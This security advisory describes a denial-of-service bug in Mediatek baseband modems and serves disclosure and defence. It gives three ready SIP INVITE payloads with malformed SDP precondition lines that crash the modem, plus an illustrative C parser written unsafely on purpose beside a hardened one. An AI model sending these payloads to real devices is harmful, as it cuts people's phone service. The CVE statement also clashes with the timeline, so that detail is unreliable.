An attacker sending a malformed SIP message over VoLTE to a device with a Mediatek baseband can trigger the vulnerability described here.

The impact is a denial of service in the baseband: the modem crashes when it receives a malformed VoLTE message, such as a SIP INVITE or MESSAGE request, carrying the malformed SDP body described below.

The vulnerability described in this advisory affects a wide range of Mediatek chipsets (see Affected Devices). It has been assigned CVE-2025-20725.

Vulnerability Details

The crash is a NULL pointer dereference in sdp_msg_create_negotiation_sdp, reached while the modem processes the SDP body of the SIP message.

It is triggered by a malformed attribute line (a= line) in the audio media description (m=audio ... RTP/AVP ...). All of the tested payloads use a malformed RFC 3312 precondition attribute (a=des:, a=curr: or a=conf:) whose fields are not valid tokens; parsing it leads to a NULL pointer access, which crashes the modem.
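The following is an added illustration of the bug class, not Mediatek's code: a small parser for the RFC 3312 precondition attributes used in the payloads, written once in the unchecked style that dereferences a table lookup result without testing it for NULL, and once in a hardened form that rejects unknown tokens and wrong field counts. The struct, table layout and function names are assumptions made for the example; the three malformed attribute lines are taken from the payloads in this advisory.

```c
#include <stdio.h>
#include <string.h>

/* Illustrative parser for RFC 3312 precondition attributes (added example,
 * not Mediatek's implementation; names and tables are assumptions).
 *
 *   a=curr:<precondition-type> <status-type> <direction-tag>                 (3 fields)
 *   a=des:<precondition-type> <strength-tag> <status-type> <direction-tag>   (4 fields)
 *   a=conf:<precondition-type> <status-type> <direction-tag>                 (3 fields)
 */
struct tok { const char *name; int id; };

static const struct tok precond_types[] = { {"qos", 1}, {NULL, 0} };
static const struct tok strengths[] = {
    {"mandatory", 1}, {"optional", 2}, {"none", 3}, {"failure", 4}, {"unknown", 5}, {NULL, 0} };
static const struct tok statuses[] = { {"e2e", 1}, {"local", 2}, {"remote", 3}, {NULL, 0} };
static const struct tok dirs[] = { {"none", 1}, {"send", 2}, {"recv", 3}, {"sendrecv", 4}, {NULL, 0} };

struct precond { int type, strength, status, dir; };

/* Table lookup of a token that is not NUL-terminated; NULL if the token is unknown. */
static const struct tok *lookup(const struct tok *t, const char *s, size_t n) {
    for (; t->name; t++)
        if (strlen(t->name) == n && memcmp(t->name, s, n) == 0)
            return t;
    return NULL;
}

/* Splits v on single spaces into tok/len. Returns the field count, or -1 if
 * there are more than max fields. Empty fields (as in "a=des: & Bg %GAm")
 * are kept with length 0 so the caller sees them as unknown tokens. */
static int split(const char *v, const char **tok, size_t *len, int max) {
    int n = 0;
    for (;;) {
        const char *sp = strchr(v, ' ');
        if (n == max)
            return -1;
        tok[n] = v;
        len[n] = sp ? (size_t)(sp - v) : strlen(v);
        n++;
        if (!sp)
            return n;
        v = sp + 1;
    }
}

/* Vulnerable pattern (illustrative): every lookup result is dereferenced
 * without a NULL check, so an unknown token such as "x" or "&" becomes a
 * read through a NULL pointer, and the field count is not checked either.
 * Only ever call this on a well-formed value. */
static void parse_des_unchecked(const char *v, struct precond *out) {
    const char *t[4] = {0};
    size_t n[4] = {0};
    split(v, t, n, 4);
    out->type     = lookup(precond_types, t[0], n[0])->id;
    out->strength = lookup(strengths, t[1], n[1])->id;
    out->status   = lookup(statuses, t[2], n[2])->id;
    out->dir      = lookup(dirs, t[3], n[3])->id;
}

/* Hardened form: attr is the attribute without the "a=" prefix. Returns 0 and
 * fills *out on success, -1 (leaving *out untouched) if the attribute is
 * malformed, so the caller can reject or ignore the offer instead of crashing. */
static int parse_precond(const char *attr, struct precond *out) {
    const char *t[4] = {0};
    size_t n[4] = {0};
    const struct tok *ty, *st, *ss, *di;
    struct precond p = {0};
    int want, cnt;

    if (strncmp(attr, "des:", 4) == 0)       { want = 4; attr += 4; }
    else if (strncmp(attr, "curr:", 5) == 0) { want = 3; attr += 5; }
    else if (strncmp(attr, "conf:", 5) == 0) { want = 3; attr += 5; }
    else return -1;                          /* not a precondition attribute */

    cnt = split(attr, t, n, want);
    if (cnt != want)
        return -1;                           /* too few or too many fields */

    ty = lookup(precond_types, t[0], n[0]);
    st = (want == 4) ? lookup(strengths, t[1], n[1]) : NULL;
    ss = lookup(statuses, t[want - 2], n[want - 2]);
    di = lookup(dirs, t[want - 1], n[want - 1]);
    if (!ty || (want == 4 && !st) || !ss || !di)
        return -1;                           /* unknown token: reject, never dereference */

    p.type = ty->id;
    p.strength = st ? st->id : 0;
    p.status = ss->id;
    p.dir = di->id;
    *out = p;
    return 0;
}

int main(void) {
    /* Attribute lines from the advisory payloads (without "a=") plus one valid line. */
    const char *samples[] = { "des: & Bg %GAm", "curr:x a b", "conf:x a b",
                              "des:qos mandatory local sendrecv" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        struct precond p;
        int rc = parse_precond(samples[i], &p);
        printf("a=%s -> %s\n", samples[i], rc == 0 ? "accepted" : "rejected (malformed)");
    }
    return 0;
}
```

The hardened parser never trusts that a token is in its table or that the grammar's field count was honoured; both checks are cheap, and each of the three advisory payloads fails one of them before any pointer is dereferenced.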

Example payload

The following SIP messages were tested. They are shown in minimal form; the trigger in each is the last a= line of the SDP body.

INVITE sip:1 SIP/2.0
Content-Type: application/sdp
From: <sip:2>;tag=659747293
To: <sip:1>
CSeq: 1 INVITE

v=0
o=0 0 0 IN IP4 0
s=0
t=0 0
m=audio 0 RTP/AVP 0
a=des: & Bg %GAm

Variants (same SIP headers, different attribute line):

INVITE sip:1 SIP/2.0
Content-Type: application/sdp
From: <sip:2>;tag=659747293
To: <sip:1>
CSeq: 1 INVITE

v=0
o=0 0 0 IN IP4 0
s=0
t=0 0
m=audio 49170 RTP/AVP 0
a=curr:x a b

INVITE sip:1 SIP/2.0
Content-Type: application/sdp
From: <sip:2>;tag=659747293
To: <sip:1>
CSeq: 1 INVITE

v=0
o=0 0 0 IN IP4 0
s=0
t=0 0
m=audio 49170 RTP/AVP 0
a=conf:x a b

Affected Devices

The affected set includes most, and possibly all, of the following chipsets:

MT6739, MT6761, MT6762, MT6762D, MT6762M, MT6763, MT6765, MT6765T, MT6767, MT6768, MT6769, MT6769K, MT6769S, MT6769T, MT6769Z, MT6771, MT6779, MT6781, MT6783, MT6785, MT6785T, MT6785U, MT6789, MT6813, MT6833, MT6833P, MT6835, MT6835T, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6878, MT6878M, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6897, MT6899, MT6980, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT6991, MT8666, MT8667, MT8673, MT8675, MT8676, MT8678, MT8765, MT8766, MT8766R, MT8768, MT8771, MT8781, MT8786, MT8788, MT8788E, MT8789, MT8791, MT8791T, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893

Timeline

  • 2025.06.23. Bug reported to Mediatek PSIRT
  • 2025.07.23. Mediatek confirms vulnerability, does not assign CVE due to low severity
  • 2025.10.01. Advisory release